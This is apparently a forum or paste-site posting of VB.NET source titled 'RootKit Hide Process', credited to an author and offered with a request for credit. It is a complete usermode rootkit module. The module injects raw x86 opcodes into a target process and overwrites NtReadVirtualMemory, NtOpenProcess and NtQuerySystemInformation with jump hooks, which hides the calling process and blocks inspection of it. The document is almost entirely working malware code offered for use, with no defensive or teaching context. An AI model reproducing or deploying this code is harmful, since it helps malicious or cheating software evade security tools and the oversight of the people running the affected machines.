
RootKit Hide Process [VB.NET] - SEMO.Pa3x

  1. Module VbRootkit
  2.  
  3. '*****************
  4. 'CREATOR: Menalix
  5. 'SITE: **** (Removed due to unknowncheats.me rules)
  6. 'If used please give proper credits.
  7. '*****************
  8.  
  9. #Region "WinAPI's"
  10.  
  11. Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean
  12. Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr
  13. Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, <Runtime.InteropServices.Out()> ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean
  14. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean
  15. Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  16.  
  17. Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
  18. Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
  19. Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr
  20.  
  21. Private Declare Function VirtualAllocEx Lib "kernel32" ( _
  22. ByVal hProcess As IntPtr, _
  23. ByVal lpAddress As IntPtr, _
  24. ByVal dwSize As UInteger, _
  25. ByVal flAllocationType As UInteger, _
  26. ByVal flProtect As UInteger) As IntPtr
  27.  
  28. #End Region
  29.  
  30. #Region "Structures"
  31.  
  32. Structure MODULEENTRY32
  33. Dim U32Size As UInteger
  34. Dim Th32ModuleId As UInteger
  35. Dim Th32ProcessId As UInteger
  36. Dim GlblcntUsage As UInteger
  37. Dim ProccntUsage As UInteger
  38. Dim ModBaseAddr As IntPtr
  39. Dim ModBaseSize As UInteger
  40. Dim HModule As IntPtr
  41. <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=256)> Dim SzModule As String
  42. <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=260)> Dim SzeExePath As String
  43. End Structure
  44.  
  45. #End Region
  46.  
  47.  
  48.  
  49. Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte()
  50.  
  51. Dim Buffer(CInt(nSize - 1)) As Byte
  52. ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing)
  53. Return Buffer
  54.  
  55. End Function
  56.  
  57. Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger
  58.  
  59. 'PE Header relative declarations
  60. Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0)
  61. Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0)
  62. Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40)
  63. Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24)
  64. Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress
  65. Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress
  66. Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress
  67.  
  68. 'Empty declarations to use later
  69. Dim tpAddress, ApiAddress, Ord As UInteger
  70. Dim ApiString As String = Nothing
  71. Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64)
  72.  
  73. 'Searching for the Export
  74. For i = 1 To NamesCnt
  75. tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0)
  76. Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64)
  77. ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr)
  78. Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0)
  79. ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress
  80.  
  81. If String.Compare(ApiString, Export, True) = 0 Then
  82. Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
  83. Return ApiAddress
  84. End If
  85.  
  86. Next
  87.  
  88. Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
  89. Return Nothing
  90.  
  91. End Function
  92.  
  93. Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr
  94. Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id))
  95. If hSnapshot = Nothing Then Return Nothing
  96. Dim me32Modules As New MODULEENTRY32
  97. me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules))
  98. If Module32First(hSnapshot, me32Modules) Then
  99. Do
  100. If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then
  101. If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr
  102. Else
  103. End If
  104. Loop While (Module32Next(hSnapshot, me32Modules))
  105. End If
  106. Return Nothing
  107. End Function
  108.  
  109. Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer
  110. Return (DesAddress - SrcAddress) - 5
  111. End Function
  112.  
  113. Sub HookApplication(ByVal ProcessName As String)
  114. Const VariablesSize As Integer = 96
  115. Dim ProcessHandle As IntPtr
  116. Dim MemoryBlockPtr As UInteger
  117. Dim Variables() As Byte = New Byte(VariablesSize) {}
  118. Dim fpGetProcessId As UInteger
  119. Dim fpGetCurrentProcessId As UInteger
  120. Dim lpProtectedAddress(3) As UInteger
  121. Dim ProtectedBuffer(3)() As Byte
  122. Dim OldProtect As UInteger = Nothing
  123. Dim WriteOffset As UInteger = Nothing
  124. Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing}
  125. Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode}
  126. Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length
  127.  
  128. 'Alloc memory for our opcode and variables
  129. ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id))
  130. MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40))
  131.  
  132. 'Fill-in variables
  133. fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId"))
  134. fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId"))
  135. lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory"))
  136. lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess"))
  137. lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation"))
  138. ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24)
  139. ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24)
  140. ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24)
  141. BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0)
  142. BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4)
  143. BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8)
  144. BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12)
  145. BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16)
  146. BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20)
  147. ProtectedBuffer(0).CopyTo(Variables, 24)
  148. ProtectedBuffer(1).CopyTo(Variables, 24 + 24)
  149. ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24)
  150.  
  151. 'Write variables and opcode to memory block
  152. WriteOffset = MemoryBlockPtr
  153. WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing)
  154. WriteOffset += VariablesSize
  155. For i = 0 To OpCodes.Length - 1
  156. WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing)
  157. WriteOffset += OpCodes(i).Length
  158. Next
  159.  
  160. 'Set memory page to execute code
  161. VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0)
  162.  
  163. 'Hook NtReadVirtualMemory
  164. WriteOffset = MemoryBlockPtr + VariablesSize
  165. BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1)
  166. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  167. WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  168. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  169.  
  170. 'Hook NtOpenProcess
  171. WriteOffset += OpCodes(0).Length
  172. BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1)
  173. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  174. WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  175. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  176.  
  177. 'Hook NtQuerySystemInformation
  178. WriteOffset += OpCodes(1).Length
  179. BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1)
  180. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
  181. WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
  182. VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
  183.  
  184. ' clean up
  185. CloseHandle(ProcessHandle)
  186.  
  187. End Sub
  188.  
  189. #Region "AsmOpCode"
  190.  
  191. Private NtReadVirtualMemory_AsmOpCode As Byte() = { _
  192. &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _
  193. &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _
  194. &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _
  195. &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _
  196. &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _
  197. &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _
  198. &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _
  199. &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _
  200. &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _
  201. &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _
  202. &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _
  203. &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _
  204. &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _
  205. &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _
  206. &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0}
  207.  
  208. Private NtOpenProcess_AsmOpCode As Byte() = { _
  209. &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _
  210. &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _
  211. &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _
  212. &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _
  213. &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _
  214. &HC9, &HC2, &H10, &H0}
  215.  
  216. Private NtQuerySystemInformation_AsmOpCode As Byte() = { _
  217. &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _
  218. &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _
  219. &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _
  220. &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _
  221. &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _
  222. &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _
  223. &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _
  224. &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _
  225. &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _
  226. &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _
  227. &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _
  228. &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _
  229. &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _
  230. &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _
  231. &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _
  232. &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _
  233. &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _
  234. &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _
  235. &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _
  236. &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _
  237. &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _
  238. &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _
  239. &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _
  240. &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _
  241. &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _
  242. &H5E, &HC9, &HC2, &H10, &H0}
  243.  
  244. #End Region
  245.  
  246. End Module